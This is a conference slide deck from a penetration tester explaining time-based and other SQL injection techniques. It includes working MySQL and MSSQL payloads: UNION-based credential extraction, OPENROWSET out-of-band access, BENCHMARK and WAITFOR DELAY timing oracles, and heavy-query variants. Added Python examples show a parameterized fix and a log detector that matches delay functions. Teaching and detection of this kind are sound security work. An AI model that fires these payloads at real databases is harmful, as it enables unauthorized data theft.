© 2008 Security-Assessment.com. Time based SQL Injection. Presented by Muhaimin Dzulfakar.
Slide 1: Time based SQL Injection. Presented by Muhaimin Dzulfakar.

Slide 2: Who am I
- Muhaimin Dzulfakar (90% of Kiwis can't pronounce it)
- Known as 'Emmie'
- Security Consultant, Security-Assessment.com
- Application and network pen-tester

Slide 3: Agenda
- What is time based SQL injection
- Differences between blind and time based SQL injection
- Time based injection with heavy queries
- Limitations of time based SQL injection

Slide 4: Different types of SQL Injection
- In band injection
- Out of band injection
- Blind SQL injection
- Time based SQL injection

Slide 5: In Band Injection
- Results are embedded via UNION SELECT
- Useful when the SQL error message is displayed
- Fastest way to extract data
- Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*

Slide 6: In Band Injection (no text on this slide)

Slide 7: Out of Band Injection
- Use a different communication channel to drill for data
- Ex: a webmail application in which data received via SMTP is processed
- Example of attack: accessing your neighbour's database server with OOB injection
- Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=; Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--

Slide 8: Out of Band Injection (diagram; labels: Web server, Database A, Database B, OOB Injection, www.buyviagra.com, 10.1.1.1)

Slide 9: Blind SQL Injection
- The application generates a custom error message for a failed response and the normal page for a successful response
- Comparison between the true and the false response
- AND 1=1 -> true; AND 1=2 -> false
- Read data byte by byte

Slide 10: Blind SQL Injection (no text on this slide)

Slide 11: Blind SQL Injection (no text on this slide)

Slide 12: Time Based SQL Injection
- Use response time to compare between true and false
- For a true response, a time delay is executed
- For a false response, the time delay is not executed
- Read data byte by byte, exactly the same method as blind injection
- First example in Chris Anley's paper "More advanced SQL Injection"
- Another example is in David Litchfield's paper "Data Mining with SQL Injection and Inference"

Slide 13: Why we need Time Based SQL Injection
- When the application generates the default page for both the true and the false response
- When the application generates the same custom error page for both the true and the false response
- The injection is successful but can't be seen by the attacker

Slide 14: Scenario 1 (blind injection attack)
    $default = 1
    if value is not between 1-20 {
        redirect user to page.php?id=$default
    }
    SQL statement:
    1 AND 1=1 [TRUE]  -> default page displayed
    1 AND 1=2 [FALSE] -> default page displayed
    BLIND INJECTION FAILED

Slide 15: Scenario 1 (time based blind injection attack)
    $default = 1
    if value is not between 1-20 {
        redirect user to page.php?id=$default
    }
    SQL statement:
    1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
    1 AND 1=2 [FALSE] -> takes 1 second to respond
    TIME BASED BLIND INJECTION SUCCESS

Slide 16: Scenario 2 (blind injection attack)
    $values = 1 to 20
    if the $values are not between 1-20 {
        redirect user to error.php
    }
    SQL statement:
    1 AND 1=1 [TRUE]  -> error page displayed
    1 AND 1=2 [FALSE] -> error page displayed
    BLIND INJECTION FAILED

Slide 17: Scenario 2 (time based blind injection attack)
    $values = 1 to 20
    if the $values are not between 1-20 {
        redirect user to error.php
    }
    SQL statement:
    1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
    1 AND 1=2 [FALSE] -> takes 1 second to respond
    TIME BASED BLIND INJECTION SUCCESS
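As an added example (not from the talk), the root cause behind Scenarios 1 and 2 beside its fix, in Python with sqlite3: the vulnerable lookup concatenates the id into the statement, so the 1 AND 1=1 / 1 AND 1=2 payloads change what the query returns (and a delay primitive would change how long it takes), while the hardened lookup validates the id before the query and binds it as a parameter, so both payloads collapse to the $default page and no true/false or slow/fast oracle remains. The items table and its 20 rows are constructed stand-ins for page.php's data.

```python
import sqlite3

DEFAULT_ID = 1  # the scenario's $default


def make_db():
    # Constructed sample table standing in for the data behind page.php (ids 1..20).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items(id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)", [(i, f"item{i}") for i in range(1, 21)])
    return con


def lookup_vulnerable(con, raw_id):
    # String concatenation: whatever follows the number becomes part of the WHERE
    # clause, so "1 AND 1=2" silently changes the result (and a time delay would run).
    sql = "SELECT name FROM items WHERE id = " + raw_id
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def parse_id(raw_id):
    # Strict type and range check: only a plain decimal integer in 1..20 survives.
    if not raw_id.isdecimal():
        return None
    value = int(raw_id)
    return value if 1 <= value <= 20 else None


def lookup_safe(con, raw_id):
    # Validation happens before the query and the value is bound as a parameter,
    # so the database never parses attacker text as SQL. Rejected input falls back
    # to the scenario's default page, the same response for every bad value.
    item_id = parse_id(raw_id)
    if item_id is None:
        item_id = DEFAULT_ID
    row = con.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchone()
    return row[0] if row else None
```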

Slide 18: Time Based SQL Injection (timing screenshot: TRUE = 2478 ms, FALSE = 117 ms)

Slide 19: Spot the difference
- Blind injection (for MySQL)
- 1 AND ASCII(substring((@@version),1,1))<52
- If the first character of the database version is less than 4 (ASCII 52 is '4'), it is true
- If the first character of the database version is 4 or more, it is false
(slide annotations on the query: query, position, operator, char)

Slide 20: Spot the difference
- Time based blind injection (for MySQL)
- 1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
- If the first character of the database version is less than 4, execute BENCHMARK (the time delay)
- If the first character of the database version is not less than 4, return 1
(slide annotations on the query: query, position, operator, char, time delay, count, time)

Slide 21: Time Based Injection on MSSQL
- Time based injection (MSSQL)
- 1 AND if not(substring((select @@version),25,1) < 52) waitfor delay '0:0:9'--
- If the first character is less than 4, execute waitfor delay (the time delay)
(slide annotations on the query: query, position, operator, char, time delay)

Slide 22: Other Databases
- Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions
- Time based injection is still possible by using heavy queries
- Chema Alonso and Jose Prada talked about this in a Microsoft Security MVP article and at Defcon 2008
- 2 types of conditions in the WHERE clause: light condition first, or heavy condition first
- Select A from B where ConditionA and ConditionB

Slide 23: Heavy condition first (results from Alonso's research; light condition 10 sec, heavy condition 100 sec)
    Heavy condition | Light condition    | Result
    False           | - (not evaluated)  | 100 seconds
    True            | True               | 110 seconds
    True            | False              | 110 seconds

Slide 24: Light condition first (results from Alonso's research; light condition 10 sec, heavy condition 100 sec)
    Light condition | Heavy condition    | Result
    False           | - (not evaluated)  | 10 seconds
    True            | True               | 110 seconds
    True            | False              | 110 seconds

Slide 25: Heavy Queries
- Oracle evaluates the conditions from left to right
- MS Access evaluates the conditions from right to left
- MSSQL evaluates the light condition first
- The table name needs to be known
- Default tables can be used for testing:
  - MSSQL: sysusers
  - MySQL: information_schema.columns
  - Oracle: all_users

Slide 26: Heavy Queries
- Example of time based injection using heavy queries on MSSQL (the light condition evaluates first)
- 1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
  (slide annotations: the count(*) self-join is the heavy query, the ASCII comparison is the light query)
- Suitable for databases that do not support time delay functions, e.g. Oracle and MS Access

Slide 27: Limitation
- Results are not reliable during busy times
- How to get reliable results?
  - Review the IP ID checking (hping3)
  - Perform the test at 3am
  - Perform the test during Xmas
- For heavy queries, the time delay depends on how much data is stored in the database: the more data, the more reliable the result
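As an added example (not from the talk), detection logic a defender can run over web access logs for the payload shapes in slides 20, 21 and 26 and the timing behaviour of slide 18, with the slide 27 caveat built in: a slow response that carries no delay primitive and no heavy self-join only rates "low", because timing alone is noisy on a busy server. The log lines, the %D response-time field and the thresholds are constructed assumptions.

```python
import re
from statistics import median
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log: Apache combined format plus %D (response time in microseconds).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2008:03:02:11 +1200] "GET /page.php?id=1 HTTP/1.1" 200 5120 117000',
    '10.0.0.5 - - [12/Aug/2008:03:02:12 +1200] "GET /page.php?id=1%20AND%20(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1)) HTTP/1.1" 200 5120 2478000',
    '10.0.0.5 - - [12/Aug/2008:03:02:15 +1200] "GET /page.php?id=1%20AND%20(select%20count(*)%20FROM%20sysusers%20as%20s1,%20sysusers%20as%20s2,%20sysusers%20as%20s3,%20sysusers%20as%20s4)>0%20AND%2052<(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 3100000',
    '10.0.0.9 - - [12/Aug/2008:03:02:16 +1200] "GET /page.php?id=7 HTTP/1.1" 200 5210 130000',
    '10.0.0.9 - - [12/Aug/2008:03:02:17 +1200] "GET /page.php?id=2 HTTP/1.1" 200 5100 1250000',  # busy-server noise, no payload
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+ (\d+)$')
DELAY_RE = re.compile(r"\b(BENCHMARK|WAITFOR\s+DELAY|SLEEP|PG_SLEEP)\b", re.I)  # delay primitives
ALIAS_RE = re.compile(r"\b(\w+)\s+AS\s+\w+", re.I)  # "table AS alias" pairs of a self-join


def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, _status, micros = m.groups()
    url = urlsplit(target)
    return {"client": client, "endpoint": url.path, "query": unquote_plus(url.query),
            "ms": int(micros) / 1000.0, "flags": set()}


def payload_flags(query):
    # Signature checks on the decoded query string.
    flags = set()
    if DELAY_RE.search(query):
        flags.add("delay-function")
    tables = [t.lower() for t in ALIAS_RE.findall(query)]
    if any(tables.count(t) >= 3 for t in set(tables)):  # same table joined to itself 3+ times
        flags.add("heavy-self-join")
    return flags


def analyze(lines, ratio=5.0, floor_ms=1000.0):
    events = [e for e in map(parse, lines) if e]
    clean = {}  # per-endpoint response times of requests carrying no suspicious payload
    for e in events:
        e["flags"] = payload_flags(e["query"])
        if not e["flags"]:
            clean.setdefault(e["endpoint"], []).append(e["ms"])
    baseline = {ep: median(v) for ep, v in clean.items()}  # median resists a few slow outliers
    for e in events:
        base = baseline.get(e["endpoint"])
        if base is not None and e["ms"] > max(ratio * base, floor_ms):
            e["flags"].add("slow-outlier")
        payload = e["flags"] - {"slow-outlier"}
        # Timing alone is noisy on a busy server (slide 27), so it only rates "low".
        e["severity"] = "high" if payload and "slow-outlier" in e["flags"] else "medium" if payload else "low"
    return [e for e in events if e["flags"]]
```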

Slide 28: Demo

Slide 29: Questions? muhaimin.dzulfakar@security-assessment.com
